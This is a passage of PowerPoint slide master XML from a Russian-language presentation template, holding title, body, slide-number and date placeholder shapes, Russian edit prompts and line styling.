          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="45"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{AB92D463-BFAB-44B7-B626-03AD7AB53079}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="46"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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93" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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0" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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171" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="47"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{7A1BEE6E-9357-4E72-B490-1BEE50F47213}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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95" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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3" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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174" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="49"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{F04F3435-0A9F-4D88-BB79-EA3C6DD65D7A}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="50"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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97" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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177" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8228880" cy="397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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="51"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{73F9DFE1-96EB-4E35-AAEB-8333ACBEC25B}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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99" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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3" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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184" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="53"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{2C6C7E6B-7FF2-4579-B265-58C03BB16298}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="54"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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01" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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187" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674240" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="55"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{4C6062A2-4193-49F8-AE64-2724D3ADEE0C}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="56"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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03" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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5" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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196" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="57"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{044E2D3A-BFDA-4A5E-ADC3-07CD4231150F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="58"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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05"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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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16" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
